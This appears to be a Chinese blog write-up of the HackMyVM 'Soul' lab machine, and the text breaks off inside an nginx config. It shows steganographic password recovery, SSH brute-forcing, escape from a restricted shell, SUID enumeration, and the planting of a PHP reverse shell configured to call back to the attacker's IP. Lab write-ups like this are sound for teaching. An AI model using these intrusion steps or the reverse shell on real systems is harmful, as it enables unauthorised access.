{"id":861,"date":"2025-06-12T14:47:30","date_gmt":"2025-06-12T06:47:30","guid":{"rendered":"http:\/\/162.14.82.114\/?p=861"},"modified":"2025-06-12T14:47:30","modified_gmt":"2025-06-12T06:47:30","slug":"hmv-_-soul","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/861\/06\/12\/2025\/","title":{"rendered":"hmv[-_-]Soul"},"content":{"rendered":"<h1>Soul<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447067.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447067.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250610235036787\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447069.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447069.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612133222389\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\n\nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8a:e9:c1:c2:a3:44:40:26:6f:22:37:c3:fe:a1:19:f2 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGJNgXS1Y8r1JG8jaFNzS\/Y\/ML8jzfgtR7buUYaKzvqfP4CcvJH6ejIbteXqAYb0JWOCxqUDghA0ucEjTSV4OUzzGP3SfGgJZX7JNJ6csgXQYRB+L5Hdrv5RqsaqjI4gG0OAI5OsBqxhtxYS4izpP2gMSYQ7HynieyMwBc3LOEOrW0ho+ZnSkYulPHSZwOyPlcI9pCgZzIzthQQmb2zn\/zsYaQGSpZNDGHI0fBj6bduKyInHMzVVe1+73v\/KLYVZhqKU0p\/bz+8szInnX6HdOv3aM7vVFtblgYlm3qLdLNsZrHYd+wfG0U5M7CgmyM7C+E\/ckCisd991h2aBVG+f2R\n|   256 4f:4a:d6:47:1a:87:7e:69:86:7f:5e:11:5c:4f:f1:48 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKPZQ2pW7+Hr\/FDzx8kKgneF\/6ISNSEQIKNTk1LdQl9q5v7PVG3McVy9CH\/PZoUezPyg4foHwPM7Rv\/eUvNELFA=\n|   256 46:f4:2c:28:53:ef:4c:2b:70:f8:99:7e:39:64:ec:07 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILIgL7+gfaj8JIU6RzELvUf4KDr\/7Z+d50QX94u3Xv2E\n80\/tcp open  http    syn-ack ttl 64 nginx 1.14.2\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\nMAC Address: 08:00:27:99:A7:45 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        1l        2w       24c http:\/\/192.168.10.100\/index.html\n200      GET      745l     4020w   339891c http:\/\/192.168.10.100\/saint.jpg\n200      GET        1l        2w       24c http:\/\/192.168.10.100\/\n200      GET        1l        1w        9c http:\/\/192.168.10.100\/robots.txt\n[####################] - 8m    882188\/882188  0s      found:4       errors:0      \n[####################] - 8m    882184\/882184  1938\/s  http:\/\/192.168.10.100\/<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447070.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447070.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612133456630\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-html\"> &lt;img src=&quot;saint.jpg&quot;&gt; <\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ curl -s http:\/\/192.168.10.100\/robots.txt                          
\n\/nothing\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ curl -s http:\/\/192.168.10.100\/nothing   \n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.14.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ wget http:\/\/192.168.10.100\/saint.jpg   \n--2025-06-12 01:36:25--  http:\/\/192.168.10.100\/saint.jpg\nConnecting to 192.168.10.100:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 190523 (186K) [image\/jpeg]\nSaving to: \u2018saint.jpg\u2019\n\nsaint.jpg                                       100%[====================================================================================================&gt;] 186.06K  --.-KB\/s    in 0.03s   \n\n2025-06-12 01:36:25 (5.40 MB\/s) - \u2018saint.jpg\u2019 saved [190523\/190523]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ exiftool saint.jpg \nExifTool Version Number         : 13.25\nFile Name                       : saint.jpg\nDirectory                       : .\nFile Size                       : 191 kB\nFile Modification Date\/Time     : 2020:11:26 05:28:37-05:00\nFile Access Date\/Time           : 2025:06:12 01:36:25-04:00\nFile Inode Change Date\/Time     : 2025:06:12 01:36:25-04:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : inches\nX Resolution                    : 300\nY Resolution                    : 300\nImage Width                     : 1280\nImage Height                    : 838\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components           
     : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 1280x838\nMegapixels                      : 1.1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt saint.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: &quot;&quot;\n[i] Original filename: &quot;pass.txt&quot;.\n[i] Extracting to &quot;saint.jpg.out&quot;.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ cat saint.jpg.out \nlionsarebigcats<\/code><\/pre>\n<h3>\u7206\u7834<\/h3>\n<p>\u8fd9\u753b\u770b\u4e0a\u53bb\u5c31\u5f88\u6709\u540d\uff0c\u5c1d\u8bd5google\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447071.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447071.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612135501936\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447072.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447072.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612135704002\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u786e\u5b9a\u4e00\u4e9b\u5173\u952e\u8bcd\uff1a<\/p>\n<pre><code class=\"language-bash\">B. Pratt\nDaniel\nB\nPratt\nb\npratt\ndaniel\nbpratt<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff0c\u5bc6\u7801\u5b9a\u4e3a<code>lionsarebigcats<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447073.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447073.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612135916626\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447074.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447074.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612140026755\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6\u4ee5\u53ca\u7a33\u5b9ashell<\/h3>\n<pre><code class=\"language-bash\">daniel@soul:~$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for daniel: \nSorry, user daniel may not run sudo on soul.\ndaniel@soul:~$ ls -la\ntotal 24\ndrwxr-xr-x 2 daniel daniel 4096 Nov 26  2020 .\ndrwxr-xr-x 5 root   root   4096 Nov 26  2020 ..\n-rw-r--r-- 1 daniel daniel  220 Nov 26  2020 .bash_logout\n-rw-r--r-- 1 daniel daniel 3526 Nov 26  2020 .bashrc\n-rw-r--r-- 1 daniel daniel  807 Nov 26  2020 .profile\n-rw------- 1 daniel daniel   50 Nov 26  2020 .Xauthority\ndaniel@soul:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n-rbash: \/dev\/null: restricted: cannot redirect output\ndaniel@soul:~$ echo $SHELL\n\/usr\/bin\/rbash<\/code><\/pre>\n<p>\u9700\u8981\u7a33\u5b9ashell\uff0c\u5c1d\u8bd5\u76f4\u63a5\u53cd\u5f39\u5230<code>pwncat-cs<\/code>\u8fdb\u884c\u81ea\u52a8\u5c1d\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447075.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506121447075.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250612140325447\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u5c1d\u8bd5\u539f\u6709\u7684shell\u8fdb\u884c\u64cd\u4f5c\u5427\uff1a<\/p>\n<pre><code class=\"language-bash\">daniel@soul:~$ bash\ndaniel@soul:~$ echo $SHELL\n\/usr\/bin\/rbash\ndaniel@soul:~$ ls -la\ntotal 24\ndrwxr-xr-x 2 daniel daniel 4096 Nov 26  2020 .\ndrwxr-xr-x 5 root   root   4096 Nov 26  2020 ..\n-rw-r--r-- 1 daniel daniel  220 Nov 26  2020 .bash_logout\n-rw-r--r-- 1 daniel daniel 3526 Nov 26  2020 .bashrc\n-rw-r--r-- 1 daniel daniel  807 Nov 26  2020 .profile\n-rw------- 1 daniel daniel   50 Nov 26  2020 .Xauthority\ndaniel@soul:~$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\ndaniel\nsshd\ngabriel\npeter\ndaniel@soul:~$ ls -la \/home\ntotal 20\ndrwxr-xr-x  5 root    root    4096 Nov 26  2020 .\ndrwxr-xr-x 18 root    root    4096 Nov 26  2020 ..\ndrwxr-xr-x  2 daniel  daniel  4096 Nov 26  2020 daniel\ndrwxr-xr-x  3 gabriel gabriel 4096 Nov 26  2020 gabriel\ndrwxr-xr-x  3 peter   peter   4096 Nov 26  2020 peter\ndaniel@soul:~$ busybox find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/sbin\/agetty\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\ndaniel@soul:~$ ls -la \/usr\/sbin\/agetty\n-rwsrws--- 1 root peter 64744 Jan 10  2019 \/usr\/sbin\/agetty<\/code><\/pre>\n<p>\u53d1\u73b0\u73b0\u6210\u7684\u63d0\u6743\u6f0f\u6d1e\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/agetty\/#suid\">https:\/\/gtfobins.github.io\/gtfobins\/agetty\/#suid<\/a> 
\u4f46\u662f\u53ef\u60dc\u54b1\u4eec\u6ca1\u6743\u9650\u6267\u884c\u3002\u3002\u3002（<code>agetty<\/code> 的权限是 <code>-rwsrws---<\/code>，属主 root、属组 peter，其他用户没有任何权限，所以 daniel 执行不了，得先拿到 peter。）<\/p>\n<pre><code class=\"language-bash\">daniel@soul:~$ busybox find \/ -user daniel -type f 2&gt;\/dev\/null | busybox grep -v proc | busybox grep -v sys\n\/home\/daniel\/.bashrc\n\/home\/daniel\/.bash_history\n\/home\/daniel\/.bash_logout\n\/home\/daniel\/.Xauthority\n\/home\/daniel\/.profile\n\/var\/www\/html\/saint.jpg\n\ndaniel@soul:~$ busybox find \/ -group daniel -type f 2&gt;\/dev\/null | busybox grep -v proc | busybox grep -v sys\n\/home\/daniel\/.bashrc\n\/home\/daniel\/.bash_history\n\/home\/daniel\/.bash_logout\n\/home\/daniel\/.Xauthority\n\/home\/daniel\/.profile\n\/var\/www\/html\/saint.jpg\n\/var\/lib\/sudo\/lectured\/daniel<\/code><\/pre>\n<h3>\u83b7\u53d6webshell<\/h3>\n<p>\u6253\u5f00\u7f51\u7ad9根目录 <code>\/var\/www\/html<\/code>\uff0c\u53d1\u73b0\u6743\u9650\u4e00\u5e94\u4ff1\u5168（目录和文件都是 <code>rwxrwxrwx<\/code>，任何用户可写）\uff0c\u5c1d\u8bd5\u53cd\u5f39<code>webshell<\/code>\u83b7\u53d6<code>www-data<\/code>\u7528\u6237\uff0c\u770b\u770b\u6709\u6ca1\u6709\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">daniel@soul:~$ cd \/var\/www\/html\ndaniel@soul:\/var\/www\/html$ ls -la\ntotal 208\ndrwxrwxrwx 2 root   root     4096 Nov 26  2020 .\ndrwxr-xr-x 3 root   root     4096 Nov 26  2020 ..\n-rwxrwxrwx 1 root   root       24 Nov 26  2020 index.html\n-rwxrwxrwx 1 root   root      612 Nov 26  2020 index.nginx-debian.html\n-rwxrwxrwx 1 root   root        9 Nov 26  2020 robots.txt\n-rwxrwxrwx 1 daniel daniel 190523 Nov 26  2020 saint.jpg\ndaniel@soul:\/var\/www\/html$ cat index.nginx-debian.html \n&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n&lt;head&gt;\n&lt;title&gt;Welcome to nginx!&lt;\/title&gt;\n&lt;style&gt;\n    body {\n        width: 35em;\n        margin: 0 auto;\n        font-family: Tahoma, Verdana, Arial, sans-serif;\n    }\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;h1&gt;Welcome to nginx!&lt;\/h1&gt;\n&lt;p&gt;If you see this page, the nginx web server is successfully installed and\nworking. 
Further configuration is required.&lt;\/p&gt;\n\n&lt;p&gt;For online documentation and support please refer to\n&lt;a href=&quot;http:\/\/nginx.org\/&quot;&gt;nginx.org&lt;\/a&gt;.&lt;br\/&gt;\nCommercial support is available at\n&lt;a href=&quot;http:\/\/nginx.com\/&quot;&gt;nginx.com&lt;\/a&gt;.&lt;\/p&gt;\n\n&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;\/em&gt;&lt;\/p&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\ndaniel@soul:\/var\/www\/html$ vi webshell.php\ndaniel@soul:\/var\/www\/html$ head webshell.php \n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.106&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\ndaniel@soul:\/var\/www\/html$ chmod +x webshell.php<\/code><\/pre>\n<p>\u76d1\u542c\u540e\u5c1d\u8bd5\u6fc0\u6d3b\uff0c\u4f46\u662f\u53d1\u73b0\u672a\u88ab\u89e3\u6790\uff0c\u770b\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">daniel@soul:\/var\/www\/html$ cd \/etc\/nginx\/\ndaniel@soul:\/etc\/nginx$ ls -la\ntotal 72\ndrwxr-xr-x  8 root root 4096 Nov 26  2020 .\ndrwxr-xr-x 73 root root 4096 Jun 12 02:18 ..\ndrwxr-xr-x  2 root root 4096 Aug 24  2020 conf.d\n-rw-r--r--  1 root root 1077 Aug 24  2020 fastcgi.conf\n-rw-r--r--  1 root root 1007 Aug 24  2020 fastcgi_params\n-rw-r--r--  1 root root 2837 Aug 24  2020 koi-utf\n-rw-r--r--  1 root root 2223 Aug 24  2020 koi-win\n-rw-r--r--  1 root root 3957 Aug 24  2020 mime.types\ndrwxr-xr-x  2 root root 4096 Aug 24  2020 modules-available\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 modules-enabled\n-rw-r--r--  1 root root 1482 Aug 24  2020 nginx.conf\n-rw-r--r--  1 root root  180 Aug 24  2020 proxy_params\n-rw-r--r--  1 root root  636 Aug 24  2020 scgi_params\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 sites-available\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 
sites-enabled\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 snippets\n-rw-r--r--  1 root root  664 Aug 24  2020 uwsgi_params\n-rw-r--r--  1 root root 3071 Aug 24  2020 win-utf\ndaniel@soul:\/etc\/nginx$ cat nginx.conf \nuser www-data;\nworker_processes auto;\npid \/run\/nginx.pid;\ninclude \/etc\/nginx\/modules-enabled\/*.conf;\n\nevents {\n        worker_connections 768;\n        # multi_accept on;\n}\n\nhttp {\n\n        ##\n        # Basic Settings\n        ##\n\n        sendfile on;\n        tcp_nopush on;\n        tcp_nodelay on;\n        keepalive_timeout 65;\n        types_hash_max_size 2048;\n        # server_tokens off;\n\n        # server_names_hash_bucket_size 64;\n        # server_name_in_redirect off;\n\n        include \/etc\/nginx\/mime.types;\n        default_type application\/octet-stream;\n\n        ##\n        # SSL Settings\n        ##\n\n        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE\n        ssl_prefer_server_ciphers on;\n\n        ##\n        # Logging Settings\n        ##\n\n        access_log \/var\/log\/nginx\/access.log;\n        error_log \/var\/log\/nginx\/error.log;\n\n        ##\n        # Gzip Settings\n        ##\n\n        gzip on;\n\n        # gzip_vary on;\n        # gzip_proxied any;\n        # gzip_comp_level 6;\n        # gzip_buffers 16 8k;\n        # gzip_http_version 1.1;\n        # gzip_types text\/plain text\/css application\/json application\/javascript text\/xml application\/xml application\/xml+rss text\/javascript;\n\n        ##\n        # Virtual Host Configs\n        ##\n\n        include \/etc\/nginx\/conf.d\/*.conf;\n        include \/etc\/nginx\/sites-enabled\/*;\n}\n\n#mail {\n#       # See sample authentication script at:\n#       # http:\/\/wiki.nginx.org\/ImapAuthenticateWithApachePhpScript\n# \n#       # auth_http localhost\/auth.php;\n#       # pop3_capabilities &quot;TOP&quot; &quot;USER&quot;;\n#       # imap_capabilities &quot;IMAP4rev1&quot; &quot;UIDPLUS&quot;;\n# \n#       
server {\n#               listen     localhost:110;\n#               protocol   pop3;\n#               proxy      on;\n#       }\n# \n#       server {\n#               listen     localhost:143;\n#               protocol   imap;\n#               proxy      on;\n#       }\n#}<\/code><\/pre>\n<p>\u63a5\u7740\u67e5\u770b<code>\/etc\/nginx\/sites-enabled\/<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">daniel@soul:\/etc\/nginx\/sites-enabled$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Nov 26  2020 .\ndrwxr-xr-x 8 root root 4096 Nov 26  2020 ..\nlrwxrwxrwx 1 root root   34 Nov 26  2020 default -&gt; \/etc\/nginx\/sites-available\/default\ndaniel@soul:\/etc\/nginx\/sites-enabled$ cat default \n##\n# You should look at the following URL&#039;s in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. 
These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Default server configuration\n#\nserver {\n        listen 80 default_server;\n        listen [::]:80 default_server;\n\n        # SSL configuration\n        #\n        # listen 443 ssl default_server;\n        # listen [::]:443 ssl default_server;\n        #\n        # Note: You should disable gzip for SSL traffic.\n        # See: https:\/\/bugs.debian.org\/773332\n        #\n        # Read up on ssl_ciphers to ensure a secure configuration.\n        # See: https:\/\/bugs.debian.org\/765782\n        #\n        # Self signed certs generated by the ssl-cert package\n        # Don&#039;t use them in a production server!\n        #\n        # include snippets\/snakeoil.conf;\n\n        root \/var\/www\/html;\n\n        # Add index.php to the list if you are using PHP\n        index index.html index.htm index.nginx-debian.html;\n\n        server_name _;\n\n        location \/ {\n                # First attempt to serve request as file, then\n                # as directory, then fall back to displaying a 404.\n                try_files $uri $uri\/ =404;\n        }\n\n        # pass PHP scripts to FastCGI server\n        #\n        #location ~ \\.php$ {\n        #       include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n        #       fastcgi_pass 